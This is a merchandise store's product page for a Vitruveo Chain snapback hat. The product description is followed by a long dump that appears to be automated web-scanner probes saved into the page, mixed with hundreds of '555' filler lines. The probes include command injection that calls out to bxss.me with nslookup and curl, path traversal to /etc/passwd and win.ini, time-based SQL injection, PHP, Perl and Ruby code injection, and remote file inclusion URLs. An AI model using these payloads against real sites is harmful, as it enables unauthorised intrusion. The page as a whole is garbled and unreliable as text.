We have relationship with White labeled vendors. This is giving us great opportunity to provide best quality of products and fast and safe shipping around the world.
Introducing the Vitruveo Chain Creators Snap Back Hat, a symbol of quality craftsmanship and style for blockchain enthusiasts and creators.
Crafted with precision, this snapback hat features a firm front panel, a sleek flat visor, and a sturdy full buckram, ensuring it maintains its shape and durability over time. With 8 rows of meticulous stitching on the brim and pro-stitching on the crown, it offers a premium finish that speaks to its quality.
Made from a blend of 85% acrylic and 15% wool, this hat strikes the perfect balance between comfort and resilience. It's structured with 6 panels and boasts a high-profile design, making it a standout accessory for any occasion.
The plastic snap closure at the back allows for easy adjustment, ensuring a secure and comfortable fit for head circumferences ranging from 22″ to 24″ (55–60 cm). The hat also features 6 embroidered eyelets that match the crown color, offering both style and ventilation.
Additionally, the grey under visor adds a touch of sophistication to this already impressive hat. Whether you're a blockchain enthusiast or a creative mind, the Vitruveo Chain Creators Snap Back Hat is the perfect addition to your wardrobe, embodying the spirit of innovation and style that defines Vitruveo Chain.
Domestic and International Flat Rate Shipping Applies to All Items. Promotional Free Shipping on Selected Items.
View our return policy: https://vulgear.com/info/refund-policy
555
555
555
20
20
555
555
555
555
555
555
1KRHR7S720
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9243115*9823696)
555
555
555
555
'+response.write(9243115*9823696)+'
555
555
555
555
"+response.write(9243115*9823696)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"'");|]*%00{%0d%0a%bf%27'
../../../../../../../../../../../../../../etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000430+9999876}
echo gaogdu$() ddkdwanz^xyu||a #' &echo gaogdu$() ddkdwanz^xyu||a #|" &echo gaogdu$() ddkdwanz^xyu||a #
555
555
555
&echo hdaviq$() kwtcnhnz^xyu||a #' &echo hdaviq$() kwtcnhnz^xyu||a #|" &echo hdaviq$() kwtcnhnz^xyu||a #
555
555
555&echo ivvnhe$() plbdkknz^xyu||a #' &echo ivvnhe$() plbdkknz^xyu||a #|" &echo ivvnhe$() plbdkknz^xyu||a #
555
555
|echo jqqiss$() zxkyzjnz^xyu||a #' |echo jqqiss$() zxkyzjnz^xyu||a #|" |echo jqqiss$() zxkyzjnz^xyu||a #
555
555
555
555
555|echo rmxart$() ojgjrxnz^xyu||a #' |echo rmxart$() ojgjrxnz^xyu||a #|" |echo rmxart$() ojgjrxnz^xyu||a #
555
555
555
expr 9000584941 - 916494
555
555
555
(nslookup -q=cname hitljawgykvawce748.bxss.me||curl hitljawgykvawce748.bxss.me))
555
555
555
555
555
555
$(nslookup -q=cname hitpnucavhvhqf70b1.bxss.me||curl hitpnucavhvhqf70b1.bxss.me)
555
555
555
&nslookup -q=cname hitvymsbszxcre213b.bxss.me&'"`0&nslookup -q=cname hitvymsbszxcre213b.bxss.me&`'
555
&(nslookup -q=cname hitmwnrokgqvg0f842.bxss.me||curl hitmwnrokgqvg0f842.bxss.me)&'"`0&(nslookup -q=cname hitmwnrokgqvg0f842.bxss.me||curl hitmwnrokgqvg0f842.bxss.me)&`'
555
555
555
|(nslookup -q=cname hitvhmjytcbjfa872e.bxss.me||curl hitvhmjytcbjfa872e.bxss.me)
555
555
555
555
`(nslookup -q=cname hitizbphmkjto30e10.bxss.me||curl hitizbphmkjto30e10.bxss.me)`
555
555
555
;(nslookup -q=cname hitxpdwvotgae21750.bxss.me||curl hitxpdwvotgae21750.bxss.me)|(nslookup -q=cname hitxpdwvotgae21750.bxss.me||curl hitxpdwvotgae21750.bxss.me)&(nslookup -q=cname hitxpdwvotgae21750.bxss.me||curl hitxpdwvotgae21750.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitcoyvzesour533b8.bxss.me||curl${IFS}hitcoyvzesour533b8.bxss.me)
555
)
555
555
555
555
555
!(()&&!|*|*|
555
555
^(#$!@#$)(()))******
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
&(nslookup${IFS}-q${IFS}cname${IFS}hitpzjgfsnbipba5d5.bxss.me||curl${IFS}hitpzjgfsnbipba5d5.bxss.me)&'"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpzjgfsnbipba5d5.bxss.me||curl${IFS}hitpzjgfsnbipba5d5.bxss.me)&`'
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
555
/etc/shells
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
c:/windows/win.ini
555
555
555
bxss.me
555
555
Http://bxss.me/t/fit.txt
555
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555'&&sleep(27*1000)*yswncr&&'
555
555
555
555
555"&&sleep(27*1000)*rwcgck&&"
555
555
555
555'||sleep(27*1000)*bfbzuf||'
555
555"||sleep(27*1000)*kquzdi||"
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hityc'.'aitthoyk1fcc3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(84).chr(118).chr(79).'
555
555
555
555
".gethostbyname(lc("hitjc"."dyeyfvsl6db41.bxss.me."))."A".chr(67).chr(hex("58")).chr(108).chr(66).chr(120).chr(82)."
555
555
555
gethostbyname(lc('hitmf'.'cpjaifld3ace8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(69).chr(116).chr(76)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
bxss.me/t/xss.html?%00
555
555
555
http://bxss.me/t/rfi.php?%00
555
555
555
555
bxss.me/t/rfi.php?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
';print(md5(31337));$a='
555
555
555
";print(md5(31337));$a="
555
555
${@print(md5(31337))}
555
555
${@print(md5(31337))}
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
'{${print(md5(31337))}}'
555
555
555
print(md5(31337));//
555
555
555
{php}print(md5(31337));{/php}
555
"+"A".concat(70-3).concat(22*4).concat(111).concat(73).concat(106).concat(82)+(require"socket" Socket.gethostbyname("hitab"+"kowdkyly3a2b5.bxss.me.")[3].to_s)+"
555
555
[php]print(md5(31337));[/php]
555
'+'A'.concat(70-3).concat(22*4).concat(112).concat(66).concat(104).concat(70)+(require'socket' Socket.gethostbyname('hityz'+'kgxuuthv69815.bxss.me.')[3].to_s)+'
555
'A'.concat(70-3).concat(22*4).concat(116).concat(69).concat(110).concat(78)+(require'socket' Socket.gethostbyname('hitzy'+'mvfljsmqcdbc1.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
555
555
555
555'"()&%Bw28(9585)
555
555
555
555
'"()&%Bw28(9558)
555
5559180143
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9930023*9511312)
555
'+response.write(9930023*9511312)+'
555
555
"+response.write(9930023*9511312)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
file:///etc/passwd
555
555
555
555
555
echo upuebn$() vtttbrnz^xyu||a #' &echo upuebn$() vtttbrnz^xyu||a #|" &echo upuebn$() vtttbrnz^xyu||a #
555
555
555
../555
555
&echo xhuady$() wkycnvnz^xyu||a #' &echo xhuady$() wkycnvnz^xyu||a #|" &echo xhuady$() wkycnvnz^xyu||a #
555
555
555
555
555&echo nwutbt$() nzpbfinz^xyu||a #' &echo nwutbt$() nzpbfinz^xyu||a #|" &echo nwutbt$() nzpbfinz^xyu||a #
555
555
555
555
|echo shgcyk$() jltqyynz^xyu||a #' |echo shgcyk$() jltqyynz^xyu||a #|" |echo shgcyk$() jltqyynz^xyu||a #
555
555
555
555
555
555|echo wnxfpq$() uodyfhnz^xyu||a #' |echo wnxfpq$() uodyfhnz^xyu||a #|" |echo wnxfpq$() uodyfhnz^xyu||a #
555
555
555
555
expr 9000612513 - 929938
555
555
555
555
(nslookup -q=cname hitvqiyvwxikc8f20a.bxss.me||curl hitvqiyvwxikc8f20a.bxss.me))
555
12345'"'");|]*%00{%0d%0a%bf%27'
555
$(nslookup -q=cname hitnmoykzngmg29db4.bxss.me||curl hitnmoykzngmg29db4.bxss.me)
555
555
&nslookup -q=cname hithargbfxkwvfbb57.bxss.me&'"`0&nslookup -q=cname hithargbfxkwvfbb57.bxss.me&`'
&(nslookup -q=cname hitdqzpryvgoi448cf.bxss.me||curl hitdqzpryvgoi448cf.bxss.me)&'"`0&(nslookup -q=cname hitdqzpryvgoi448cf.bxss.me||curl hitdqzpryvgoi448cf.bxss.me)&`'
555
555
555
|(nslookup -q=cname hitioqzjzvjqld1b3b.bxss.me||curl hitioqzjzvjqld1b3b.bxss.me)
`(nslookup -q=cname hitwjdbsgceyhea2e5.bxss.me||curl hitwjdbsgceyhea2e5.bxss.me)`
555
;(nslookup -q=cname hitzvwinraamraa06e.bxss.me||curl hitzvwinraamraa06e.bxss.me)|(nslookup -q=cname hitzvwinraamraa06e.bxss.me||curl hitzvwinraamraa06e.bxss.me)&(nslookup -q=cname hitzvwinraamraa06e.bxss.me||curl hitzvwinraamraa06e.bxss.me)
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitgyzgjtviqa1af66.bxss.me||curl${IFS}hitgyzgjtviqa1af66.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitamxebbqcged6d24.bxss.me||curl${IFS}hitamxebbqcged6d24.bxss.me)&'"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitamxebbqcged6d24.bxss.me||curl${IFS}hitamxebbqcged6d24.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${10000209+9999415}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
redirtest.acx
555
)
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
^(#$!@#$)(()))******
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
555
555
555
/etc/shells
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
'.gethostbyname(lc('hitmk'.'joxoshvv19036.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(82).chr(117).chr(83).'
c:/windows/win.ini
bxss.me
555
555
555
555
".gethostbyname(lc("hitdg"."snwztvlg79663.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(81).chr(119).chr(89)."
Http://bxss.me/t/fit.txt
555
555
gethostbyname(lc('hitdj'.'lqdyrtba97075.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(71).chr(101).chr(73)
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
555
'"()
555
555
555
555
555
555
555
555
555
555'&&sleep(27*1000)*ketocc&&'
555
555
555
555
555
555"&&sleep(27*1000)*dlvglq&&"
555
555
555'||sleep(27*1000)*bjncjz||'
555
555
555
555
555
555"||sleep(27*1000)*nwtyky||"
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
bxss.me/t/xss.html?%00
555
555
555
555
555
';print(md5(31337));$a='
555
555
http://bxss.me/t/rfi.php?%00
555
555
";print(md5(31337));$a="
555
555
555
555
bxss.me/t/rfi.php?%00
${@print(md5(31337))}
555
555
555
555
555
555
555
555
555
${@print(md5(31337))}
555
555
555-1; waitfor delay '0:0:15' --
555
555
'.print(md5(31337)).'
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(109).concat(88).concat(114).concat(81)+(require"socket" Socket.gethostbyname("hittc"+"rjzoxixob87c5.bxss.me.")[3].to_s)+"
555
555
555
555
555
'{${print(md5(31337))}}'
555
555
print(md5(31337));//
'+'A'.concat(70-3).concat(22*4).concat(114).concat(79).concat(112).concat(70)+(require'socket' Socket.gethostbyname('hited'+'jmveahmlc5be2.bxss.me.')[3].to_s)+'
{php}print(md5(31337));{/php}
555
555
555
555
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(120).concat(90).concat(100).concat(72)+(require'socket' Socket.gethostbyname('hitqw'+'zdzjcydq50c47.bxss.me.')[3].to_s)
[php]print(md5(31337));[/php]
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
'"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1 waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5556DRglENy'; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1 OR 106=(SELECT 106 FROM PG_SLEEP(15))--
555
555
555
555
555
555'"()&%lIfQ(9043)
555
555
555
555
555
555
'"()&%lIfQ(9628)
555
555
555
5559306344
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9067384*9012923)
555
555
555
555-1) OR 92=(SELECT 92 FROM PG_SLEEP(15))--
555
555
'+response.write(9067384*9012923)+'
555
555
555
555
555
555
"+response.write(9067384*9012923)+"
555
555
555
555
555
555
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555-1)) OR 605=(SELECT 605 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555qUtWFc0i' OR 133=(SELECT 133 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
${9999856+10000270}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555m1Ftbg2T') OR 527=(SELECT 527 FROM PG_SLEEP(15))--
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
555
12345'"'");|]*%00{%0d%0a%bf%27'
file:///etc/passwd
555
555
555
555
555
555-1; waitfor delay '0:0:15' --
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555b5Xug6RV')) OR 403=(SELECT 403 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
)
555
!(()&&!|*|*|
echo sutoqu$() nbmnvwnz^xyu||a #' &echo sutoqu$() nbmnvwnz^xyu||a #|" &echo sutoqu$() nbmnvwnz^xyu||a #
555
555
555
555
555
555
^(#$!@#$)(()))******
&echo jevjra$() ainnhonz^xyu||a #' &echo jevjra$() ainnhonz^xyu||a #|" &echo jevjra$() ainnhonz^xyu||a #
555
555
555
555-1); waitfor delay '0:0:15' --
555
555
555&echo bgvmaw$() hushmcnz^xyu||a #' &echo bgvmaw$() hushmcnz^xyu||a #|" &echo bgvmaw$() hushmcnz^xyu||a #
555
555
555
555
555
555
555
|echo wegmuv$() volrjznz^xyu||a #' |echo wegmuv$() volrjznz^xyu||a #|" |echo wegmuv$() volrjznz^xyu||a #
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555|echo ufrboe$() lurvmnnz^xyu||a #' |echo ufrboe$() lurvmnnz^xyu||a #|" |echo ufrboe$() lurvmnnz^xyu||a #
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
expr 9000674237 - 945403
555
555
redirtest.acx
555
555
/etc/shells
(nslookup -q=cname hitacesjfzyng38a37.bxss.me||curl hitacesjfzyng38a37.bxss.me))
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
$(nslookup -q=cname hitrkalnevdkl7843b.bxss.me||curl hitrkalnevdkl7843b.bxss.me)
555
555
555-1 waitfor delay '0:0:15' --
555
555
555
555
&nslookup -q=cname hitcuidojhdvs9c365.bxss.me&'"`0&nslookup -q=cname hitcuidojhdvs9c365.bxss.me&`'
bxss.me
555
555
555
555
555
Http://bxss.me/t/fit.txt
555
&(nslookup -q=cname hitwdwgeyrpbi9a4bc.bxss.me||curl hitwdwgeyrpbi9a4bc.bxss.me)&'"`0&(nslookup -q=cname hitwdwgeyrpbi9a4bc.bxss.me||curl hitwdwgeyrpbi9a4bc.bxss.me)&`'
555
555
555
555
555
555
555
|(nslookup -q=cname hithoenutmyuv1d98e.bxss.me||curl hithoenutmyuv1d98e.bxss.me)
http://bxss.me/t/fit.txt%3F.jpg
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555
555
`(nslookup -q=cname hitwboxybqied6f780.bxss.me||curl hitwboxybqied6f780.bxss.me)`
555
555
555
555
555
555
555
;(nslookup -q=cname hitguawnrqgox21993.bxss.me||curl hitguawnrqgox21993.bxss.me)|(nslookup -q=cname hitguawnrqgox21993.bxss.me||curl hitguawnrqgox21993.bxss.me)&(nslookup -q=cname hitguawnrqgox21993.bxss.me||curl hitguawnrqgox21993.bxss.me)
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitbgejtlntuu61cf1.bxss.me||curl${IFS}hitbgejtlntuu61cf1.bxss.me)
555
555
555
555V0p9IDsS'; waitfor delay '0:0:15' --
555
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitkuryxbxvaxb50d2.bxss.me||curl${IFS}hitkuryxbxvaxb50d2.bxss.me)&'"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitkuryxbxvaxb50d2.bxss.me||curl${IFS}hitkuryxbxvaxb50d2.bxss.me)&`'
555
555
555
555
'.gethostbyname(lc('hitvx'.'rfgsyeen8ab0b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(84).chr(106).chr(83).'
555
555
555
555
555
555
555
".gethostbyname(lc("hitph"."avsibjag0c34c.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(84).chr(110).chr(67)."
555
555
555
555
555
555
555
gethostbyname(lc('hittz'.'dnahbexoe740c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(75).chr(107).chr(72)
555
555
555
555
555
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
bxss.me/t/xss.html?%00
555
555'"
555
555
"+"A".concat(70-3).concat(22*4).concat(119).concat(87).concat(97).concat(77)+(require"socket" Socket.gethostbyname("hitfw"+"ghaqkmot1615f.bxss.me.")[3].to_s)+"
555
555
555
http://bxss.me/t/rfi.php?%00
555
555
555-1 OR 120=(SELECT 120 FROM PG_SLEEP(15))--
555
555
555
@@jyvD1
555
'+'A'.concat(70-3).concat(22*4).concat(121).concat(83).concat(111).concat(86)+(require'socket' Socket.gethostbyname('hitip'+'fnauugwgf0636.bxss.me.')[3].to_s)+'
'"()
555
bxss.me/t/rfi.php?%00
555
555
(select 198766*667891)
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(105).concat(88).concat(109).concat(81)+(require'socket' Socket.gethostbyname('hithv'+'psynobmrfd9f6.bxss.me.')[3].to_s)
555'&&sleep(27*1000)*cyeuuk&&'
555
555
555
(select 198766*667891 from DUAL)
555
'"
555
555"&&sleep(27*1000)*uejilq&&"
555
555
555
555
555
555'||sleep(27*1000)*ulaxgp||'
555
555
555
555
555
555"||sleep(27*1000)*scsxvm||"
555
555
555
555
555
555
555-1) OR 820=(SELECT 820 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%oQEL(9599)
555
555
555
555
555
555
555
555
555
555
555
555
'"()&%oQEL(9623)
555-1)) OR 670=(SELECT 670 FROM PG_SLEEP(15))--
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555
555
555
555
5559530532
555
';print(md5(31337));$a='
555
555
555
555
555
555
";print(md5(31337));$a="
555
555
555
555
555
555
555
555
${@print(md5(31337))}
555
555
555
555
555
555
${@print(md5(31337))}
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
555ihwCsTlk' OR 457=(SELECT 457 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
'{${print(md5(31337))}}'
555
555
555
555
555
555
print(md5(31337));//
555
555
555
{php}print(md5(31337));{/php}
555
555
[php]print(md5(31337));[/php]
555
555
555
555CODOnqJu') OR 621=(SELECT 621 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555CTkFhZhJ')) OR 994=(SELECT 994 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555
555
555
555
555
555
555'"
555
555
555
555
555
@@eVzdc
555
555
(select 198766*667891)
555
555
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
555
555-1; waitfor delay '0:0:15' --
555
555-1); waitfor delay '0:0:15' --
555
555-1 waitfor delay '0:0:15' --
555
555TISXmtY4'; waitfor delay '0:0:15' --
555
555
555-1 OR 177=(SELECT 177 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555-1) OR 500=(SELECT 500 FROM PG_SLEEP(15))--
555
555
555-1)) OR 519=(SELECT 519 FROM PG_SLEEP(15))--
555
555
555cR8pyH6L' OR 438=(SELECT 438 FROM PG_SLEEP(15))--
555
555
555G3kYlhTj') OR 254=(SELECT 254 FROM PG_SLEEP(15))--
555
55526lQmwEe')) OR 229=(SELECT 229 FROM PG_SLEEP(15))--
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)
555
555'"
555
@@rVyzR
555
(select 198766*667891)
(select 198766*667891 from DUAL)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9414183*9447110)
555
555
'+response.write(9414183*9447110)+'
555
555
555
"+response.write(9414183*9447110)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"'");|]*%00{%0d%0a%bf%27'
555
555
555
555
555
555
555
555
${10000329+10000192}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo qgfiem$() gcqbwinz^xyu||a #' &echo qgfiem$() gcqbwinz^xyu||a #|" &echo qgfiem$() gcqbwinz^xyu||a #
555
555
555
555
555
555
&echo qhpuzs$() dvxribnz^xyu||a #' &echo qhpuzs$() dvxribnz^xyu||a #|" &echo qhpuzs$() dvxribnz^xyu||a #
555
555
555
555
555
555
555&echo ttikwb$() xsbkwrnz^xyu||a #' &echo ttikwb$() xsbkwrnz^xyu||a #|" &echo ttikwb$() xsbkwrnz^xyu||a #
555
555
555
555
555
|echo qonyqi$() ryygomnz^xyu||a #' |echo qonyqi$() ryygomnz^xyu||a #|" |echo qonyqi$() ryygomnz^xyu||a #
555
555
555
555
555
555
555|echo gxcilj$() xqyofpnz^xyu||a #' |echo gxcilj$() xqyofpnz^xyu||a #|" |echo gxcilj$() xqyofpnz^xyu||a #
555
555
)
555
555
555
expr 9000614410 - 915184
555
555
!(()&&!|*|*|
555
555
555
(nslookup -q=cname hituokfdfutbne3584.bxss.me||curl hituokfdfutbne3584.bxss.me))
555
^(#$!@#$)(()))******
555
555
555
$(nslookup -q=cname hitnhfchhhxoz52cc0.bxss.me||curl hitnhfchhhxoz52cc0.bxss.me)
555
555
555
555
555
555
&nslookup -q=cname hitenkmsoqgwhf2bc8.bxss.me&'"`0&nslookup -q=cname hitenkmsoqgwhf2bc8.bxss.me&`'
555
555
555
555
555
&(nslookup -q=cname hityxbyqgvrwt5ce38.bxss.me||curl hityxbyqgvrwt5ce38.bxss.me)&'"`0&(nslookup -q=cname hityxbyqgvrwt5ce38.bxss.me||curl hityxbyqgvrwt5ce38.bxss.me)&`'
555
|(nslookup -q=cname hitludbncqhjccc321.bxss.me||curl hitludbncqhjccc321.bxss.me)
555
555
555
555
`(nslookup -q=cname hitrkwcstjpnl2d897.bxss.me||curl hitrkwcstjpnl2d897.bxss.me)`
555
555
555
555
555
555
;(nslookup -q=cname hitmohzvtmqzkc5abd.bxss.me||curl hitmohzvtmqzkc5abd.bxss.me)|(nslookup -q=cname hitmohzvtmqzkc5abd.bxss.me||curl hitmohzvtmqzkc5abd.bxss.me)&(nslookup -q=cname hitmohzvtmqzkc5abd.bxss.me||curl hitmohzvtmqzkc5abd.bxss.me)
555
555
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitmmlkyggscjc41c4.bxss.me||curl${IFS}hitmmlkyggscjc41c4.bxss.me)
555
redirtest.acx
555
555
555
555
555
555
